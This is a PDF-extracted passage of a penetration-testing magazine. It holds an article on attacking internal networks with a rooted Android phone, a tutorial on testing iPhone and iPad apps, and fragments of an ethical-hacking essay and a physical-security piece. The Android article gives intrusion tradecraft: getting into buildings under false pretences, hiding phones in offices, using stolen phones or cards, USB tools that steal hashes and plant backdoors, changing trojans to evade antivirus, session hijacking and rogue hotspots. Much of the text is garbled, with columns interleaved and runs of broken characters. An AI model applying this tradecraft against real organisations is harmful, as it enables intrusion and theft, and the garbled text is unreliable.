explained, and the steps to avoid such vulnerabilities committed to current system architectures without
were specified through specific procedures to close a firm requirement for security. It is imperative for
any security gaps discovered during such process. The organization to execute regular auditing, implementing
report also offers advices on how to raise awareness, vigilant intrusion detection and inherent a good system
and advice on how to close the vulnerabilities and administration practices, and computer security
keep them closed. The report is considered to be a awareness that can guarantee business continuity and
very sensitive issue since such vulnerabilities found success. A single failure in any of these areas could
and stated in such report if it fell into the wrong hands very well expose an organization to cyber-vandalism,
might be used against the company’s vulnerabilities to and loss of revenue and client’s information. While
gain access to sensitive information within the company ethical hackers can help clients better understand their
networks. security needs, it is up to the clients to keep their guards
The ethical hackers would have an ongoing in place.
responsibility to ensure the safety of any information
they retain, and as such; in most cases all information
related to the work is destroyed at the end of the BRYAN SOLIMAN
contract. Bryan Soliman is a Senior Solution Designer currently working
with Ontario Provincial Government. He has over twenty
Conclusion years of Information Technology experience with Bachelor
The idea of testing the security of a system by trying degree in Engineering, Bachelor degree in Computer Science,
to break into it is not a new idea such test were done and Master degree in Computer Science.

a d v e r t i s e m e n t
PENTEST EXTRA

Is That A Phone In
Your Pocket
Or Are You Scanning My Network?

When most people think of penetration testing, they think of a


simulated external attack where the tester tries to break into a
network from a remotely. Companies focus most of the security
spending and policies on keeping hackers from the outside in,
from firewalls and other security hardening appliances, software
and tools.

H
owever, given the proliferation of mobile devices
in the workplace and use of Wi-Fi networks
inside of an office, attacking from inside the
network provides unique opportunities. Smartphones
have become much more powerful over the past few
years, with powerful processors and a plethora of
hardware at your fingertips. Combine this power into a
compact unit with the right apps you can scan a network
from the inside in seconds along with several other new
types of attacks and information gathering.
Mobile devices have accelerated productivity as they
move to replace many of the other devices we used
to carry in a small package. Most phones have Wi-
Fi capability, cameras, mass storage capability and a
persistent internet connection via 3G and 4G and allow
a wide number of applications and if rooted provide
many of the same tools as a computer, but with more
hardware and network capabilities. These conveniences
also carry over to make them an very powerful tool to
use in penetration tests, more powerful I would argue
than a laptop, as a mobile device can be easily hidden
on your person, or inside of an office building.
Most organizations spend a great deal of money and
time focusing on protecting their networks form outside
threats, making sure the hackers outside cannot get in.
However, security inside the network is generally lacking,
both physical security and network security. Security is
generally more relaxed inside an office because of the Figure 1. Ordinary cell phone can be a powerful tool

THE BEST OF 01/2012 Page 86 http://pentestmag.com


simple need to get work done. Attacking a network from tablet is quite kludgy and you would be better served
within has actually become easier over the last few years. using a netbook. For this article I will stick with Android
As there are an increasing number and variety of devices specific tools that take advantage of the portability and
inside an office than there were even just a few years ago hardware available to smartphones.
when you dealt primarily with stationary desktop systems In some of the examples I outline hiding a phone in an
hard wired via ethernet in secured offices. office building, which runs the risk of the device being found
Today most offices utilize Wi-Fi, with a many different and tracked back to me if the device has an active SIM
types of devices in use from laptops, tablet computers, card. To mitigate this risk an attacker would use a phone
mobile phones, flash drives and portable media they purchased used, or that was stolen with the SIM card
players. Not only are there devices that are owned by removed and will rely on Wi-Fi to connect to the device
the company, but also people’s personal devices they remotely from outside. T-Mobile sells pre-paid smartphone
bring in from home. Attacking from inside is a target rich plans with data connectivity now, however they still require
environment with a multitude of attack vectors. Given a credit card to get. A criminal could use a stolen credit
the increasing number of devices that are brought in card and identity to get a phone with a working SIM that
and being used, internal policies regarding the use of is untraceable, but for the purposes of our test we will be
these devices is generally lax, not enforced or simply sticking with primarily Wi-Fi based connections.
non-existent. Employees are generally also not trained
on security issues around mobile devices, which is USB Hacks
something you can take advantage of in your tests. The first set of tools I will install on the device are not
mobile apps at all. Android devices easily double as a flash
Getting Inside drive, which provides a great attack vector to leverage
Attacking inside of a network poses the unique many USB based tools to infect a network and steal data
challenge of getting inside or at least close to your from behind the firewall. Even today, USB flash drives are
target, however there are a number of ways to do this a great way to deliver a malicious payload, particularly
using a bit of social engineering. A few ways to get inside
of a corporate building are via job interviews, business
meetings, or posing as a delivery driver, maintenance
worker, cleaner or solicitor, or get an insider to help you
(even if they are not aware they are helping you).
Many companies also host events, particularly tech
companies, where they allow their space to be used for
developer meet-ups, or presentations so watch for this
opportunity as well. You may not even need to get inside
the building, but can work outside of it in the parking lot,
an office next door, the employee cafeteria or other
areas that are not secured. Monitor the company’s
website and check for jobs posted, used online services
such as LinkedIn to search for positions as well as
track current employees of the target company for
opportunities that may present themselves.

The Phone Setup


As my weapon of choice I use an Android phone,
a rooted Samsung Galaxy S to be specific. I highly
recommend rooting the phone and installing a ROM such
as Cyanogen, for this article I am using Cyanogen 7.
Many of the apps I will mention here require a rooted
device and require root privileges. I have seen some apps
that are available for rooted iOS devices, however there
are many more robust solutions available for Android.
You can install most Linux distros on an Android
phone including Backtrack 5 using Gitbrew. However
using a Linux distro on an Android phone, even on a Figure 2. Network Discovery

THE BEST OF 01/2012 Page 87 http://pentestmag.com


PENTEST EXTRA
in highly secure environments. The International Space There are many other great tools available that
Station was even hit by a virus that was transmitted via can be loaded from a USB device, or you can easily
flash drive, flash drives are also the primary suspect in create your own. A lot of the USB based trojans in
the delivery of Stuxnet and the recent keylogger malware the wild have been flagged by anti-virus companies
discovered on military systems controlling drones. as malicious, however if you get the source code and
With a mobile device you also have a great excuse modify it you can easily create executables with unique
to plug the device into a computer My phone battery signatures that will not be detected. If you plan on
is about to die, can I plug my USB charger into your hijacking a host computer and transmit data to outside
computer for a bit? the network, make sure you use an SSL connection,
There are a number of USB tools available that will this will help evade firewalls as well as hide what data is
allow you to pull data, a few easy tools include USB being transmitted outside the network.
Hacksaw and USB Switchblade both of which are When conducting a penetration test you usually do
multipurpose utilities which will pull data from the target not need to actually transmit data, simply writing a
device and open backdoors into the system. The primary simple script that is executed that sends the IP address,
purpose of the tools are to silently recover information name of the person logged into the computer and
from Windows systems, such as password hashes, LSA unique device IDs is enough to indicate the system and
secrets, IP information, as well as browser history, and potentially the network could have been compromised.
auto-fill information as well as create a backdoor to the How far you actually go to show the network was
target system for later access. The data can be quickly infiltrated is between you and the client, just be aware
loaded to the phone as the tools only need a few seconds that some of the USB based tools mentioned above can
to pull sensitive information from a given device. cause harm to the system and data as well as other
Another useful tool is USBDumper which can be loaded devices on the network.
onto a target computer and will silently copy the contents
of any removable media device connected to the computer Network & Vulnerability Scanners
and can be modified to upload this data to a remote The first mobile application you need is for network
location. This tool can be handy if you see and gain access mapping, there are quite a few available in the Android
to a shared system that might be used for presentations in Marketplace. Network Discovery, is a great one that is
a conference room, this is usually the case at colleges and free and does not require your device to be rooted. The
universities and some businesses as well. user interface is really well designed and provides you

Figure 3. Looking for potential targets

THE BEST OF 01/2012 Page 88 http://pentestmag.com


with a clear view of the network and devices at a glance, The first version of the application only had a few
not easy to do with the limited screen real-estate on a exploits, however the developer provided me with an
mobile device. The application identifies the OS and early version of the 2.1 release which has a larger
manufacturer of the device as well as identifies the type library of potential exploits. In addition the suite provides
of device. The Network Discovery app works well when additional tools including a brute force password
connected to a Wi-Fi network that you know is open cracking tool along with different types of dictionaries to
or have the password to access and provides great load for the attack.
visibility of the target network. The Cracker feature runs well and hits all open ports it
Mapping a network is one thing, but being able to scan finds on devices within the network. This can take some
for open Wi-Fi, scan device ports, find vulnerabilities time depending on the number of ports and the type
and other acts take a lot more time and usually a lot dictionary used in the attack. I was able to locate several
more tools. Thankfully an Israeli security firm called vulnerabilities on a test network, mostly Windows file
Zimperium has made this easier for you, with their shares and a router that still had the manufacturer’s
Android Network Toolkit named Anti. default password settings.
Anti provides automated tools to carry out penetration The in-app Wi-Fi monitor feature provides a listing of
testing tasks on insecure wireless networks. Once all Wi-Fi networks, their signal strengths and whether or
activate the app will run scans to find open networks, not they are open via an easy to read icon, along with the
locate devices on the network and determine device’s MAC address. The network scanning is quite
vulnerabilities on the devices. Once vulnerabilities are fast and I was able to map a decent sized network in
discovered the app can run exploits from Metasploit and about 30 seconds. When you run the scan it then asks
ExploitDB to gain access at which stage you can then you if you want to initiate an intrusive scan which gathers
trigger various actions remotely from your phone from more information regarding potential vulnerabilities.
taking a screen shot to ejecting the disc drive to prove Some of the features I was not able to test such as
you have control of the target machine. Foreign Targets where you can run scans on domains

Figure 4. Before spoo�ng Figure 5. Spoof running

THE BEST OF 01/2012 Page 89 http://pentestmag.com


PENTEST EXTRA
and IPs outside the network, even use Anti’ whenever I Spoofing, which will make it undetectable, however
tried this the app would crash, guess due to the version I is not as efficient and will not pick anything up on an
have being beta. Other useful features include an HTTP encrypted network.
Server you can run and the ability to run initiate attacks The application provides a Generic mode that will
from Zimperium’s cloud utilities to run penetration tests display all possible account sessions, not just from known
from outside of the network. sites like Twitter and Facebook. During my test I was able
Anti is a great tool that makes mobile penetration testing to pick up sessions from Wordpress, Facebook, Twitter
as easy as one click, allowing you to run quick tests for and Trimet.org (Portland’s public transporation portal).
unsecured Wi-Fi networks and gather information in an Another application that provides a more invasive
automated fashion. The fact you can initiate a scan and approach is Network Spoofer which allows you to user
put the phone in your pocket makes it a powerful tool. ARP Spoofing to actually alter the web traffic being
sent to a network or specific machine. The application
Session Hi-Jacking & ARP Spoofing requires a pretty large download at around 600MB
Many may be familiar with FireSheep, the Firefox which is actually a Debian image that includes Squid
browser plug-in that allowed you to easily sniff out and proxy to modify the data and some other tools to modify
hijack Facebook, Twitter and other sessions. Well there images and other tasks. The application allows you to
is also an app for that, it is called DroidSheep and it redirect web traffic to a specific site, flip images, alter
work similarly. The application requires a rooted Android queries and other harmless attacks allowing you to
phone. Once you run the application you can run the show the client the network was compromised.
app in a few different modes, when it is connected to The application works well on an open network,
an open network it uses ARP spoofing to hijack the however on a WPA/WPA2 network it simply cripples or
sessions. A word of warning, on some networks it slows the network. Hardware is also an issue, although
can slow a network and be detected, this occurred a the application works with most phones, some device
few times on my test network. You can disable ARP- are incompatible, I tested it on a Nexus One and a
Galaxy S and both worked.

Wi-Fi Sniffing
Network Spoofer also allows you redirect all network
traffic directly to the phone. The packet data can then be
logged by packet sniffer application such as Shark for
root which is one of the better apps I found for this task.
The issue with using ARP Spoofing for this however is
that it can slow or cripple the network.
A better route for packet sniffing is to create a Wi-
Fi hotspot on the device itself. A great thing about a
rooted Android phone is the ability for it to be an ad-
hoc Wi-Fi hot spot. By creating an open Wi-Fi hot spot
on the device that has a similar name to an existing
on in the office, or one that simply one that looks like
a guest account (Acme-Guest) allows you a great way
to intercept a great deal of traffic from users duped into
connecting to it. There are a number of packet sniffing
apps available for Android, the best I have found is
Shark for root, which logs the pcap file to the SD card of
your device. There is also a Shark Reader application
that allows you to read the pcap files, however you will
probably want to copy the files over to your laptop via
FTP etc and view them in Wireshark.
The one thing I hate about Shark for root is that as
it is a free app ads appear at the top, this can actually
mess with capture. The fact you have ads running in
a security app is wrong for many reasons, I wish they
Figure 6. Con�guring Wi-Fi hotspot would offer a paid for version of the app without ads.

THE BEST OF 01/2012 Page 90 http://pentestmag.com


Remote Shell & Scripting
There are a number of terminal emulators available
for Android including one that comes with Cyanogen,
however I would also recommend installing ConnectBot
as it allows for multiple sessions and secure tunnels.
I also installed Scripting Layer for Android (SL4A) to
allow me to run scripts from the device as needed. Once
these apps are loaded it makes it easier to remotely
deploy and execute scripts to the device. I installed the
Python interpreter on my device to run various scripts
to automate capturing photos and wiping apps from
the device if it becomes compromised. If you prefer
to write your own native Android apps more power
Figure 7. Smartphones are more powerful than computers
to you, but I found it a lot easier to have a scripting
Remote Access environment available to me on the device for on-the-fly
Smartphones are not only good for running apps, but app development.
also have a lot of other great hardware in one package One great feature of SL4A is the ability to write a
that makes them great for use in spying from the inside. script remotely and then execute it on the phone. SL4A
If you are able to sneak a phone into an office building provides server support and you can then execute
and plug it in to a wall socket you will have have eyes commands from your laptop to the phone, you have
and ears in the building as well as provide yourself with access to pretty much the entire Android SDK using this
more time to run tests from the outside. Plants make a method all at your disposal without the need to compile
great hiding place, as they are usually against a wall and deploy anything. You need to install the SL4A
near power outlets. Common areas such as break engine and the scripting language you wish to use, I
rooms are also a good place as you can leave them in use Python, but other languages are available including
plain sight, most will assume it is a co-workers phone Ruby, Perl, JavaScript, Lua and BeanShell. For more
left to charge. information on setup and configuration of SL4A visit the
Most smartphones today have at least one camera, project homepage.
which can be accessed remotely, many of these tools As you can see a smartphone can be a very powerful
also come with motion detection. Some apps can also tool in your penetration test arsenal, in some ways much
call out to another number when motion is detected more powerful than a laptop. The sophistication of many
allowing you to listen in on any conversations that may applications available for Android, particularly on rooted
be occurring near the phone. devices provide an increasing number of weapons for
A free tool that makes remote access easy is Remote penetration testers and hackers alike. Using these tools
Web Desktop a free app available in the Android to test your network, as well as being aware of what
Marketplace which provides access to all the hardware tools malicious users may be using to find a weakness
on the device including the camera, as well as the ability will help you better secure your environment. Many
to launch apps remotely from a web browser on your of these applications provide rich user interfaces and
laptop. You can connect directly through Wi-Fi, or if you reports that will also help you visually show your clients
are using the 3G connection you can use their bridging and employees the risks that mobile devices can pose
service to access the device. in their organization if policies and procedures are not
Remote Web Desktop also provides access to all the followed.
apps on the phone, as well as an FTP server to easily
transfer log files and reports from the device. Another KEN WESTIN
helpful utility that Remote Web Desktop provides is the Ken Westin is the Founder and CEO of ActiveTrak Inc, the
ability to bridge the connection. If for example you are innovator of the popular GadgetTrak© cross-platform mobile
using the 3G connection vs Wi-Fi they provide a service security and data protection software. He is regularly reached
that allows you to easily connect to the device remotely, out to by the press as a subject matter expert regarding
however keep in mind that this approach could leave a mobile security and data privacy,speaks at conferences
trace of your activities. This approach also provides you and provides training to law enforcement regarding new
with access to the device if you are using the device technologies. His endpoint security research and tools are
as a Wi-Fi hotspot, as you cannot run connect to the included in the Certi�ed Ethical Hacker training materials and
device via Wi-Fi as well as run it as a hot spot. other publications.

THE BEST OF 01/2012 Page 91 http://pentestmag.com


PENTEST EXTRA

Penetration Testing
for iPhone and iPad Applications

Mobile application penetration testing is an up and coming


security testing need that has recently obtained more attention,
with the introduction of the Android, iPhone, and iPad platforms
among others.

T
he mobile application market is expected to including banking and trading. A plethora of companies
reach a size of $9 billion by the end of 2011 are rushing to capture a piece of the pie by developing
(http://www.mgovworld.org/topstory/mobile-ap new applications, or porting old applications to work
plications-market-to-reach-9-billion-by-2011) with the with the smartphones. These applications often deal
growing consumer demand for smartphone applications, with personally identifiable information (PII), credit card
and other sensitive data.
This article focuses specifically on helping security
professionals understand the nuances of penetration
testing iPhone/iPad applications. It attempts to cover
the key steps the reader would need to understand
such as setting up the test environment, installing the
simulator, configuring the proxy tool and decompiling

Figure 1. iPhone SDK Installer Figure 2. Location of all the iPhone tools installed with the SDK

THE BEST OF 01/2012 Page 92 http://pentestmag.com


Figure 3. iPhone Simulator Figure 5. Displays location of a sample iPhone application

applications etc. To be clear this article does not Pre-requisites


attempt to discuss the security framework of the iPhone
itself, identify flaws in the IOS, or try to cover the entire • Mac Book running Snow Leopard 10.6.2 OS or
application penetration testing methodology. above.
• Apple IOS 4.0.1 (for testing iPhone applications)
Setting up the Test Environment and IOS 3.2 (for testing iPad applications).
There are several ways to test mobile applications e.g.: • Charles Proxy.
• SQLite Manager.
• Using a regular web application penetration testing
chain (browser, proxy). Installing the IOS SDK
• Using WinWAP with a proxy (http://www.winwap.com/ The iPhone/iPad simulator is not available for
desktop_applications/winwap_for_windows). download, as an independent application. In order
• Using a phone simulator with a proxy (http:// to use the simulator, you need to install the complete
speckyboy.com/2010/04/12/mobile-web-and-app- IOS Software Development Kit (SDK). The simulator
development-testing-and-emulation-tools/).
• Using a phone to test and proxy outgoing phone
data to a PC.

In this article we will focus on using a phone


simulator with a proxy as it is the easiest and
cheapest option out there for testing iPhone
applications. For some platforms, this can be difficult
but for iPhone/iPad applications, use of a simulator is
easy and effective.

Figure 6. Dragging the foobar application to Simulator Bundler


Figure 4. iPad simulator creates foobar (iPhone simulator) application

THE BEST OF 01/2012 Page 93 http://pentestmag.com


PENTEST EXTRA
Using the Simulators
After successfully installing the SDK, the simulator can
be launched from this location /Developer/Platforms/
iPhoneSimulator.platform/Developer/Applications.
To access the iPad simulator select it under the
Hardware > Device option as displayed below.

Getting the Binaries to Run on the Simulator


When developers successfully build the application
using Xcode, it launches the application with
the correct simulator for testing. However, apple
has not provided a straightforward technique for
Figure 7. Setting to intercept all HTTP(s) requests from all Mac packaging and transferring these binaries to the
applications testers. I recommend using the following hack (http://
comes packaged with the SDK installer. However, www.tuaw.com/2009/07/03/developer-to-developer-
only registered apple developers could download the simulator-application-sharing-for-iphone/) to get the
SDK (http://developer.apple.com/programs/register/). binaries from development to the test environment.
Download IOS 4.0.1 for testing iPhone applications
(http://developer.apple.com/iphone/index.action) Steps for the Developers:
and IOS 3.2 for iPad application. IOS 3.2 is the only
SDK that allows development and testing of the iPad • Launch the application project in Xcode and select
applications. The apple developer center does not allow Build > Go. This will compile the source code and
downloading archived versions of the IOS. I had some create the binaries that could then be redistributed
difficulty getting access to the IOS 3.2 installer. The if the build was successful.
SDK includes XCODE IDE, iPhone simulator (4.0.1), • Binaries created using the above step will be available
iPad simulator (3.2) and other tools for development at /Users/<username>/Library/Application Support/
and testing. iPhone Simulator/<IOS version e.g. 3.2 (iPad) or 4.0.1
(iPhone)>/Applications/<folder with unique application
Steps to install the SDK id>.
• Copy this folder and provide it to the testers for
• After downloading the 2.3 GB IOS installer, find testing.
where the .dmg file is downloaded. It is normally
located on the Desktop or under the User > Steps for the Testers
Downloads folder.
• Double click this file to open the disk image. • Set up the test environment to match development
• Double click the installer and follow on screen environment using the correct Mac OS X and IOS
instructions. It requires up to 6.53 GB of free space versions.
on the machine. • Copy the binaries provided by the developers to the
• After successful installation a new Developer folder same location mentioned above.
will be placed on the top level of your hard drive. All • The newly copied application will now be available
the tools for iPhone development and testing are for testing when the simulator is launched.
located under this directory.
Alternatively, you could
use the Simlaunch (http://
github.com/landonf/simlaunch/)
application. It automates the
steps mentioned above and
Figure 8. Shows the execution of the script makes transferring of the
binaries easier and less error
prone. It basically builds custom
executables to automatically
launch an embedded iPhone/
Figure 9. TrustStore.sqlite3 database opened using SQLite Manager application iPad Simulator application

THE BEST OF 01/2012 Page 94 http://pentestmag.com


Figure 10. Obtaining SHA1 hash of the Charles certi�cate
Figure 12. Output of the decompiled application using otool
using the correct SDK using Spotlight. Simlaunch works
for both iPhone and iPad simulators. most common choices are WebScarab, Paros, Burp
and Charles. I prefer Charles proxy for two main
Steps reasons. First, it provides an option to intercept data
from every application running on Mac OS X without
• Install the Simulator Launcher application. requiring manually changing of the proxy settings for
• Drag the application binary onto the Simulator each and every application. You just need enable Proxy
Builder icon. > Mac OS X Proxy option as displayed in the Figure 7.
• This will create a new Mac OS X application that This will intercept all the HTTP(s) requests from the
bundles and launches the simulator application. Safari browser, Simulators etc.
• The Figure 6 shows that the foobar application The second big advantage is that it is easy to setup (http://
was dropped on the simulator bundler icon which www.charlesproxy.com/documentation/faqs/#qa_177) and
created the highlighted oobar (iPhone Simulator) works seamlessly with the iPhone/iPad simulators if the
application. Double clicking this application application performs server certificate validation checks.
launches it in the iPhone simulator as shown in the It provides a shell script (http://www.charlesproxy.com/
Figure 6. assets/install-charles-ca-cert-for-iphone-simulator.zip) that
could be executed to bypass this check. The script backs
Setting up a Proxy tool up the TrustStore.sqlite3 database and installs Charle’s
There are several proxy tools available (http:// SSL certificate in the keychain for your iPhone/iPad
research.corsaire.com/tools/) for the Mac OS X. The simulator as displayed in the Figure 8.

Figure 11. Command to decompile the application using the otool

THE BEST OF 01/2012 Page 95 http://pentestmag.com


PENTEST EXTRA
in the figure below which could be pasted into the table
as shown Figure 10.

Decompiling the iPhone/iPad Applications


There are several benefits of decompiling the
application when performing penetration testing. It
helps you perform more thorough security assessment
by reviewing the code. You can also run Static Source
code analyzer mentioned later, on the decompiled code
to identify issues such as buffer overflows etc.
Applications for the iPhone/iPad are written using
objective-C, which are fairly easy and straightforward
to decompile. You can obtain the application binaries
by downloading them from the Appstore and then
transferring them to your Mac books using iTunes.
There are two tools available for performing the de-
compilation. One option is to use the otool that comes
with the Xcode. Command:

otool -toV „/Users/consultant/Library/Application Support/


Figure 13. Output of the decompiled application using class-
iPhone Simulator/4.0.1/Applications/744F3613-A728-4BD7-
dump-x
A490-A95A6E6029F7/HelloWorld.app/HelloWorld” >> Helloworld.dump
This could also be achieved manually without the
need of a script (http://stackoverflow.com/questions/ Alternatively, you could use the Class-dump-x (http://
347690/iphone-truststore-ca-certificates). If you open iphone.freecoder.org/classdump_en.html) tool. This
the TrustStore.sqlite3 database using the SQLite tool provides easily readable information on class
Manager (discussed later in the article) you will see declarations and structs. Command:
that it stores a SHA1 hash of server certificate in the
tsettings table as Figure 9. >consultants-macbook-pro-17:Applications consultant$ cd
The location of trusted certificates for iPhone /Applications
simulator is: /Users/<User Profile>/Library/Application >consultants-macbook-pro-17:Applications consultant$ bash
Support/iPhone Simulator/4.0.1/Library/Keychains. >bash-3.2$ ./class-dump-x „/Users/consultant/Library/
The location of trusted certificates for the iPad Application Support/iPhone Simulator/4.0.1/Applications/
simulator is: /Users/<User Profile>/Library/Application 744F3613-A728-4BD7-A490-A95A6E6029F7/HelloWorld.app” >>
Support/iPhone Simulator/3.2/Library/Keychains. Helloworld.classdump
You can manually edit the tsettings table to replace
the SHA1 hash with Charle’s hash. To find the hash Static Source Code analysis
for Charles proxy’s certificate, install the certificate for Static code analysis (http://developer.apple.com/mac/
it on the Mac using either Safari or Firefox. Open the library/featuredarticles/StaticAnalysis/index.html) is the
certificate and you will find the hash value as displayed technique for analyzing code without actually executing
it first. In most cases analysis is performed on the
source code or the object code. The technique of
examining the application during runtime is known as
dynamic analysis (mentioned later). As we already
know by now it is really easy to decompile an iPhone/
iPad application. Attackers thus, have the source code
and can use these tools to find flaws in the applications
and we should be doing the same during the testing.
Static Analysis for the applications could be performed
using either Flawfinder (http://dwheeler.com/flawfinder/)
or Clang (http://clang-analyzer.llvm.org/). Flawfinder is
Figure 14. The �gure shows successful build with four issues only useful if the application uses native C libraries such
identi�ed by the analyzer as strcpy instead of Cocoa objects such as nsstring. If

THE BEST OF 01/2012 Page 96 http://pentestmag.com


��������
������������������������������������������
����� ������ ���������� ���������� ���� �����
������ ���� ����� �������� ����� ����
�������������� ��������������� ����� ��������
���������������������������������������������
���� ���������� ���� ���� ����� �������� �����
������������������������������������
Figure 15. Displays results from the analyzer

the application does not use such libraries, then Clang �������������������������
should be used. Static Analysis technique could be ��������������������
leveraged to uncover issues such as memory leaks,
uninitialized variables, dead code, type mismatch, buffer
overflows etc. This could be done using Xcode if source
code of the application is available. The static analyzer
travels down each possible code path, identifying logical
��������
errors such as memory leaks. This could be performed � �������������������������������
using the Build > Build Analyze menu option as shown �
����������������������������������
in the Figure 14 and Figure 15. �
��������������������
Dynamic Analysis
��
���������������������
�����������������
��

Dynamic Analysis refers to the technique of assessing


applications during the execution. There are several
��

tools that are provided by Apple for this purpose. The


����������
���

two main tools that we will be discussing in this article


are Instruments and Shark. You can find detailed �����������������������


description of these and other tools here (http://
�����������������������
developer.apple.com/iphone/library/documentation/
Performance/Conceptual/PerformanceOverview/
PerformanceTools/PerformanceTools.html). �������������������������
��������������������������
Instruments
The Instruments tool was introduced in Mac OS X ������������������������
v10.5. It provides a set of powerful tools to assess
the runtime behavior of the application. This tool
could be compared with the several sysinternal (http://
technet.microsoft.com/en-us/sysinternals/default.aspx)
tools used for thick client testing on the windows platform
such as diskmon, procmon, netmon etc. It could be

������������������������������������������
Figure 16. Shows use of different instruments �����������������

THE BEST OF 01/2012 97


PENTEST EXTRA

Figure 19. The cached keystrokes in dynamic-text.dat �le


be cached, or hidden files used by the application
to store data on the client side.
• Memory leaks: Helps identify memory leaks.
Figure 17. The below �gure displays Instruments in action
recording �le activity data
• Process: Similar to Process monitor used on
windows for thick client testing. It shows real time
launched from /Developer/Applications/Instruments. Once process threat activity.
launched, select the Blank template under the iPhone • Network Monitoring: Records network activity such
simulator section. Select the instruments you want to as netmon.
use from the library. To inject this tool into a process
select Choose Target > Attach to Process > iPhone Shark
Simulator (<pid>). Click record and start using the Shark is mainly used for performance gathering. But, in
application in the simulator to generate the activity data. addition to this it could also be used to analyze assembly
Following is a brief explanation of how to use it: level operations. For e.g. it could do the following:

• File Activity: Records file open, close and stat • Statistical sampling of your application over a
operations. This is similar to diskmon that we period of time
use in windows for thick client testing. It lets you • System-level tracing
identify the files generated and processed by the • Malloc tracing
application. It is a great tool to identify files that may • Static analysis
• L2 Cache profiling
• Java code analysis

It is shipped with every version of Mac OS X 10.3 or


newer. It comes as part of the Xcode Tools. It could be

Figure 18. Using Shark for Dynamic Analysis Figure 20. Automatic screenshots and its location

THE BEST OF 01/2012 Page 98 http://pentestmag.com


Figure 23. Account number found in the SQLite database

~/Library/Application Support/iPhone Simulator/4.0.1/


Library/Keyboard/dynamic-text.dat for auto correction
unless appropriate measures are taken. This issue
is similar to AUTOCOMPLETE for the web browsers. If
AUTOCOMPLETE is not set to off for the UITextField and is not
set to secure then the text entered in these fields will get
Figure 21. Location of the PasteBoard cached. However, iPhone do not store password fields
launched from /Developer/Applications/Performance Tools/ at any time.
Shark.After launching it select what you want Shark to
trace (for e.g. Static Analysis in the example below), Snapshots
specify the Process and select iPhone simulator as Every time user taps the Home button, window of the
shown in the Figure 18. open application shrinks and disappears. In order to
create this shrinking effect, iPhone takes an automatic
Data Protection screenshot (http://www.wired.com/gadgetlab/2008/09/
Data protection is the most important category hacker-says-sec/; http://www.iphonefootprint.com/2008/
when testing mobile applications as they are more 09/iphones-privacy-flaw-it-takes-automatic-screenshots-
susceptible to loss and theft compared to computers. of-all-your-latest-actions/). Screenshots are stored in
In addition to this, cached data may get copied to the the snapshots directory of the application. For e.g.
machines that are used for syncing and could be stolen the sample Helloworld application stores them here
from there. IPhone is known to be notorious (http:// ~/Library/Application Support/iPhone Simulator/4.0.1/
www.telegraph.co.uk/technology/apple/7880155/How- Applications/744F3613-A728-4BD7-A490-A95A6E6029F7/Library/
your-Apple-iPhone-spies-on-you.html) for caching Caches/Snapshots/com.yourcompany.HelloWorld.
sensitive information such as keystrokes, snapshots Applications should thus, mask sensitive information
etc. Moreover, the application itself may be storing on the screen to not only prevent it from shoulder
sensitive information in form of temporary files, .plist surfing attacks but, also from getting leaked via these
files, or in the client side SQLite database etc. During screenshots (Figure 20).
the testing we should identify these risks and provide Individual users with privacy concerns could follow these
recommendations to mitigate them. steps on a jailbroken iPhone to disable the screenshots
(http://www.iphone-hacks.com/2008/09/24/how-to-
Keyboard Cache disable-the-iphones-automatic-screen-capture/).
All the keystrokes (http://www.security-faqs.com/did-
you-know-that-the-iphone-retains-cached-keyboard- UIPasteBoard
data-for-up-to-12-months.html) entered on iPhone If the iPhone application uses UIPasteBoard for copying
could potentially get cached (http://stackoverflow.com/ and pasting objects, this information could be obtained
questions/1955010/iphone-keyboard-security) here by other applications from the clipboard. In addition

Figure 22. Cached PDF �le with Account Number information Figure 24. Userid stored in the .plist �le

THE BEST OF 01/2012 Page 99 http://pentestmag.com


PENTEST EXTRA
not be encrypted and contain sensitive information such
as account numbers, SSN etc. It may also contain the
application state information which could be tampered to
bypass the application logic. To read, or edit the SQLite
database any of the available clients can be used.
For e.g. the SQLite Manager Firefox add-on (http://
code.google.com/p/sqlite-manager/) is one of the tool
that gets the job done. Sensitive data should be never
stored on the client side. It should always be kept on the
server side or stored in the keychain. Encryption of the
data in the SQLite database should be used as a last
resort as the implementation may get tricky and may
demand careful key management.

Property list (.Plist) �les


Property list files are not a good place to store sensitive
Figure 25. Crash log �les information. Instead, applications should store sensitive
information in the keychain. Apple uses sandboxing
to this if persistent pasteboard property is used by mechanism to limit access to other application’s data.
the developer the copied information will be stored However, despite sandboxing, numerous application
unencrypted on the iPhone’s file system and could property files are in fact readable by other applications.
be found here ~/Library/Application Support/iPhone This is because of the loose sandbox rules. In addition
Simulator/4.0.1/Library/Caches/com.apple.UIKit.pboard . to this file system can be browsed and files read
If the application contains sensitive information then using open source tools such as Fswalker (http://
private pasteboards should be used for copy and paste code.google.com/p/fswalker/) even on a non jail broken
operations, and persistent property should be used device.
sparingly.
Log Files
Cached �les Applications may generate excessive logs, if not
If the application displays PDF, Excel or other files it is disabled in the production version of the application.
possible that these files may get cached on the device These log files may contain sensitive information that
here /Users/<username>/Library/Application Support/iPhone could be leaked. Logs are mostly stored at the following
simulator/3.2/Applications/<application folder>/Documents/ locations:
temp.pdf as displayed in the Figure 22.
• ~/Library/Logs/CrashReporter/MobileDevice/<DEVICE_NAME>
SQLite Database • /private/var/log/system.log
Mobile applications store client side data in the SQLite
database on iPhone. Information in the database may

KUNJAN SHAH
Kunjan Shah is a Principal Consultant at Foundstone
Professional Services, A division of McAfee based out of
the New York office. Kunjan has over 6 years of experience
in information security. He has dual Master’s degree in
Information Technology and Information Security. Kunjan
has also completed certi�cates such as CISSP, CEH, and
CCNA. Before joining Foundstone Kunjan worked for
Cigital. At Foundstone Kunjan focuses on web application
penetration testing, thick client testing, mobile application
testing, web services testing, code review, threat modeling,
risk assessment, physical security assessment, policy
development, external network penetration testing and other
Figure 26. Location of the system.log �le service lines.

THE BEST OF 01/2012 Page 100 http://pentestmag.com


101
PENTEST EXTRA

Guaranteed Access
Everyone has different ideas of what physical security is, what it
encompasses, and how to exploit it. It can include a wide range of
exploits, many being surprisingly simple. Regardless of method,
going after physical security in a PenTest often proves one of the
easiest ways to gain access to a network. Sometimes physical
exploits are almost looked on as cheating, simply because some of
them are so simple, so obvious, and yet completely unprotected.

W
ith the advent of Svartkasts and PwnPlugs, targets such as the Nuclear Power plants in Iran, and
physical security is no longer a boring subject the U.S. Governments Secret SIPR networks being
for pentesters. To pentesters these devices victims to physical layer compromise. If there’s one
are some of the most exciting exploits at any level. guaranteed way to gain access to any network, it’s with
To businesses they’re a nightmare. The criticality of a physical layer exploit. Everyone has different ideas
physical security can’t be overstated, with high value of what physical security is, what it encompasses, and

